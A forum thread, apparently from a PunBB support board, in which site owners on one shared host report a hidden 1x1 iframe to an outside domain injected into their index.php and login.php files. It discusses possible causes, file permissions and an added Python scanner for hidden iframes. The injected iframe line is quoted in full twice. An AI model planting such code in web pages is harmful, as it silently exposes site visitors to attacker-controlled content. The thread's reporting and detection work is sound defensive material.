Topic: Unexpected "<" ?

Hey there,

I think something strange is going on, but I'm not sure. So I thought I'd report it here.

A couple days ago my pun index returned an error saying there was an unexpected "<" on the last line of the index.php

I went into the index file and looked.

I found:

<!-- o4 --><iframe src="http://t.fala.org.ua/" width=1 height=1 style="display:none"><!-- c4 -->

I'd never seen this before, so I removed it and the index worked just fine again.

I also reset my index page's permissions to be sure they weren't writable (they weren't, but I reset the permissions anyway).

Today a similar issue appeared with login.php

same code:

<!-- o4 --><iframe src="http://t.fala.org.ua/" width=1 height=1 style="display:none"><!-- c4 -->

appended at the bottom of the login.php

What's going on?
How are people able to get into my server and add this broken code?

How can I stop it?

Re: Unexpected "<" ?

Are you on a shared host? (or your own server)

Re: Unexpected "<" ?

A shared host, but it's my own account, and no one else has access.

The error logs have been blowing up lately, so this looks like some kind of issue from outside.
But I wouldn't know, many of the errors are simple people trying to log in and can't because of the 'unexpected ">"' message

very strange.

Re: Unexpected "<" ?

Congratulations, you got hacked.

Re: Unexpected "<" ?

elbekko wrote:

Congratulations, you got hacked.

yeah, awesome.

Thanks.

But the question is:
How to determine where the hack came in?

I ran the user management plugin, and removed all the users who have never posted and are unverified.
I changed my login and password at the server level.
I removed the calendar mod, and the link mod.
So now the only other addition to my board is the chatbox, the ajax version.

I am considering turning off guest access and new logins until I've gotten to the bottom of this, but at this point I'm not sure if it will do any good.

I suppose I could post my error logs so that people here could take a look, and possibly defend others from this type of attack, but they're huge and I don't want to do that unless it's going to be helpful.

Re: Unexpected "<" ?

You might want to contact your host and ask if there have been any security breaches recently. Shared hosts try to ensure that you and you alone have access to your files -- and usually succeed -- but on occasion they trip up.

Question: when you say that the line is appended to the bottom of the pages, do you mean the PHP source, the HTML source, or both?

Looking for a certain modification for your forum? Please take a look here before posting.

Re: Unexpected "<" ?

I mean the root php documents for punbb

not the templates. not the style.

the actual documents themselves.

Re: Unexpected "<" ?

Also, no, my host (CWI) says there have been no security breaches.
No one but me has logged into my account.

Curious.

Re: Unexpected "<" ?

Are your files chmodded such that someone else could edit them?

Re: Unexpected "<" ?

or is PHP(/webserver) allowed to edit the files?

Re: Unexpected "<" ?

I also have a site hosted at CWI which was modified with the exact same code, July 23rd.

It looked like whoever hacked the site used a script which searched through the site for files with index or login in the name, and then searched for </body> in the text and inserted the above code just above the end body.

I reported the issue to CWI and they told me that there had been a login from a server in Hong Kong.

Re: Unexpected "<" ?

interesting.

so this means what? I deleted all my unposting users using the user management plugin, but wouldn't you have to be logged into the server to access these files?

the code hasn't returned, but we are certainly vulnerable.

very troubling.

Re: Unexpected "<" ?

Unless you figure out how the person got in, I would assume it wasn't a PunBB issue: as alano said, it was probably done by a script looking for vulnerable files. Make sure your files aren't writable by the webserver's user.
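
Added example, not part of the original thread and not PunBB code: a Python check for the two things discussed above, a hidden iframe like the one quoted in the first post and files that are writable by group or other. The extension list, the function names and the sample tree (including the `injected.example.invalid` URL) are constructed for illustration.

```python
import os
import re
import stat
import tempfile

IFRAME = re.compile(rb"<iframe\b[^>]*>", re.I)
# Hidden = display:none, or a width/height of 0 or 1 (as in the snippet quoted in the thread)
HIDDEN = re.compile(rb"display\s*:\s*none|(?:width|height)\s*=\s*[\"']?[01]\b", re.I)
EXTS = (".php", ".html", ".htm", ".tpl")  # assumed set of web-served file types

def scan(root):
    """Return sorted (relative path, finding) pairs for files under root."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(EXTS):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read()
            # Flag any iframe tag whose attributes hide it from the visitor
            if any(HIDDEN.search(m.group(0)) for m in IFRAME.finditer(data)):
                findings.append((rel, "hidden-iframe"))
            # Group- or world-writable files can be changed by other accounts
            if os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((rel, "writable-by-others"))
    return sorted(findings)

def demo():
    """Build a constructed sample tree and scan it."""
    injected = (b'<?php echo "ok"; ?>\n<iframe src="http://injected.example.invalid/"'
                b' width=1 height=1 style="display:none">\n')
    samples = {  # constructed sample files: name -> (content, mode)
        "index.php": (injected, 0o644),
        "login.php": (b"<?php // clean ?>\n", 0o666),
        "viewtopic.php": (b'<iframe src="/map.html" width=600 height=400></iframe>\n', 0o644),
    }
    with tempfile.TemporaryDirectory() as root:
        for name, (content, mode) in samples.items():
            path = os.path.join(root, name)
            with open(path, "wb") as fh:
                fh.write(content)
            os.chmod(path, mode)
        return scan(root)

if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:20} {rel}")
```

On hosts where PHP runs as the account owner, permission bits alone do not keep a compromised script or stolen login from editing files, so the content check is worth running on a schedule and comparing against a known-good copy.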

Re: Unexpected "<" ?

I disabled the links page and the calendar and it seems to be ok now.

Re: Unexpected "<" ?

Well, not sure if this post is dead or not. But I thought I'd put my two cents in. Several of our pages were hacked as well with the same code. Weird. We use CWI as well. Did anyone find out what this hack does, or what securities it might have breached? Thanks all!

non-techie's first post so please be kind.

peace